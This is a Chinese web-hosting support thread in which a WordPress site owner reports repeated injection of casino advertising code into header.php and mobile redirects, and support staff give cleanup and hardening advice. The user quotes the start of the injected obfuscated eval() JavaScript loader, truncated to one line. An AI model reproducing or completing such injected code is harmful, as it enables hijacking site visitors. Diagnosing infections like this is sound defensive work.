問：后臺(tái)提示被掛馬，內(nèi)容如下（對(duì)應(yīng)的文件是/2162.html/index.html.bak）： 03:37:59)網(wǎng)站因存在木馬（特征: 熱血傳奇，路徑：wp-content/cache/supercache/www.tvtv.hk/archives/2162.html/index.html5月1日左右也有類似提示，發(fā)現(xiàn)/www/wp-content/themes/minty/header.php被加入代碼（葡京在線的廣告，見文末），刪除后將所有/minty/目錄下的文件全部設(shè)置為只讀。今天又提示被掛馬，雖然header.php沒有被修改，但我知道木馬肯定沒清理干凈。前幾天，我還將數(shù)據(jù)庫和根目錄下所有文件復(fù)制到一個(gè)新的云主機(jī)下，更換域名（www.qupc.net），目錄可讀可寫，關(guān)閉WP Super Cache緩存插件，發(fā)現(xiàn)過了幾天header.php自動(dòng)被寫入上次一樣的代碼。除了文件頭被修改，用手機(jī)瀏覽網(wǎng)站，有時(shí)會(huì)自動(dòng)跳轉(zhuǎn)到廣告網(wǎng)站，而且只有第一次瀏覽會(huì)跳轉(zhuǎn)，然后過幾天才能再跳轉(zhuǎn)，試了電信、移動(dòng)都是如此，換手機(jī)也是一樣。（網(wǎng)址沒記，好像每次都不一樣）。
< type=\”text/javascript\”>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?\”\”:e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!\’\’.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){r

答：您好，
??1、wp-content/cache/supercache/www.tvtv.hk/archives/2162.html/index.html  不是掛馬文件，您網(wǎng)頁內(nèi)容含有關(guān)鍵詞“熱血傳奇”，請(qǐng)您修改下關(guān)鍵詞。
??2、我司通過工具掃描和分析近期訪問日志，沒有發(fā)現(xiàn)掛馬文件。通過文件管理只設(shè)置了www只讀，www下目錄沒有設(shè)置只讀，建議您設(shè)置不需要修改文件只讀。
3、如再次出現(xiàn)掛馬修改文件，請(qǐng)暫時(shí)不要恢復(fù)修改文件，我司需要通過修改時(shí)間點(diǎn)日志分析排查，非常感謝您長(zhǎng)期對(duì)我司的支持!

問：這么說熱血傳奇是誤報(bào)了，可是被篡改為什么查不出？我換了服務(wù)器都沒用，太不尋常了吧截圖為header.php第一次被篡改的時(shí)間：2018?年?5?月?1?日，??23:24:36。之后我將header.php設(shè)為只讀，雖然沒有再被篡改，但是今天的百度搜索依然出現(xiàn)了異常。而且換服務(wù)器換域名后，header.php一旦改回可讀可寫，還是會(huì)被篡改，可見還是有問題的。

問：補(bǔ)充一點(diǎn)，對(duì)比了一下FTP和后臺(tái)管理器的時(shí)間，發(fā)現(xiàn)相差8小時(shí)，我本地保留的header.php是從FTP下載的，顯示的也是FTP時(shí)間，那么header.php真正的修改時(shí)間應(yīng)該是5月1日15：24：36

答：您好，
1、對(duì)應(yīng)時(shí)間日志中查看，通過您網(wǎng)站后臺(tái)編輯過文件，請(qǐng)核實(shí)是不是您當(dāng)時(shí)操作過。如果不是，建議您修改后臺(tái)密碼和后臺(tái)路徑再觀察。
2、百度快照并沒有更新，請(qǐng)?jiān)L問http://help.baidu.com/newadd?prod_id=1&category=1&link=http%3A%2F%2Fcache.baiducontent.com%2Fc%3Fm%3D9d78d513d9d430dc4f9b93697c65cba6d0020ea78449e3732b415011e8aca7d13b275fa0131aacbe3df2de8d9f4aaafdd66e6b9f27432a459bf4%26p%3D876ad415d9c041a90cb08c2d0214bb%26newp%3D92769a479e9d33ee44bd9b7d0ddb2151d4db1e6b82c825d7331b001c3bbfbd6c37b6603a4485debf13ca3dda5c91d9fb4c57479c%26user%3Dbaidu%26fm%3Dsc%26query%3D%25CA%25D5%25CA%25D3%25C2%25CA%25B2%25E9%25D1%25AF%26qid%3De100a6c70000c0d5%26p1%3D6 投訴更新快照，非常感謝您長(zhǎng)期對(duì)我司的支持!

西部數(shù)碼（west.cn）是經(jīng)工信部、ICANN、CNNIC認(rèn)證審批，持有ISP、云牌照、IDC、CDN、頂級(jí)域名注冊(cè)商等全業(yè)務(wù)資質(zhì)的正規(guī)老牌服務(wù)商，自成立至今20余年專注于域名注冊(cè)、虛擬主機(jī)、云服務(wù)器、企業(yè)郵箱、企業(yè)建站等互聯(lián)網(wǎng)基礎(chǔ)服務(wù)！

截止目前，已經(jīng)為超過2000萬個(gè)域名提供了注冊(cè)、解析等服務(wù)，是中國(guó)五星級(jí)域名注冊(cè)注冊(cè)商！已為超過50萬個(gè)網(wǎng)站提供了高速穩(wěn)定的云托管服務(wù)，獲評(píng)中國(guó)最受用戶喜歡云主機(jī)服務(wù)商。

西部數(shù)碼提供全方位7X24H專業(yè)售后支撐，域名注冊(cè)特價(jià)1元起，高速穩(wěn)定云主機(jī)45元起，更多詳情請(qǐng)瀏覽西部數(shù)碼官網(wǎng)：http://ps-sw.cn/





猜你還會(huì)喜歡下面的內(nèi)容

• 網(wǎng)站為什么打開正常，百度跳轉(zhuǎn)成非正規(guī)網(wǎng)站
• 你好，網(wǎng)站開通一下MP4的流媒體播放功能
• MySQL 外網(wǎng)地址無法訪問
• 登錄顯示不出來驗(yàn)證碼-虛擬主機(jī)/數(shù)據(jù)庫問題
• 顯示連接數(shù)據(jù)庫失敗是什么原因
• dfcmotor168 的虛擬主機(jī)請(qǐng)刪除備案碼
• FTP賬號(hào)：里面的文件誤刪了還能恢復(fù)嗎
• 新開的主機(jī)，怎么顯示空間已經(jīng)占滿了？
• 云數(shù)據(jù)庫 訪問很慢-虛擬主機(jī)/數(shù)據(jù)庫問題
• 無法正常php程序-虛擬主機(jī)/數(shù)據(jù)庫問題
• mssql數(shù)據(jù)庫鏈接問題
• gdztgc.com這個(gè)站是綁定哪個(gè)主機(jī)？
• 香港體驗(yàn)主機(jī)網(wǎng)站程序已經(jīng)上傳
• 怎么發(fā)短信說沒有解析你們服務(wù)器是什么問題。
• 上傳網(wǎng)站文件失敗-虛擬主機(jī)/數(shù)據(jù)庫問題
• dghaifa服務(wù)器設(shè)置了index.html為首頁，還是打

熱門標(biāo)簽

其他問題云服務(wù)器問題域名及賬戶問題企業(yè)郵局市場(chǎng)咨詢云服務(wù)器云建站/云站群/小程序虛擬主機(jī)網(wǎng)絡(luò)知識(shí)企業(yè)郵箱域名注冊(cè)域名備案域名商標(biāo)注冊(cè)云主機(jī)更多標(biāo)簽...

大家感興趣的內(nèi)容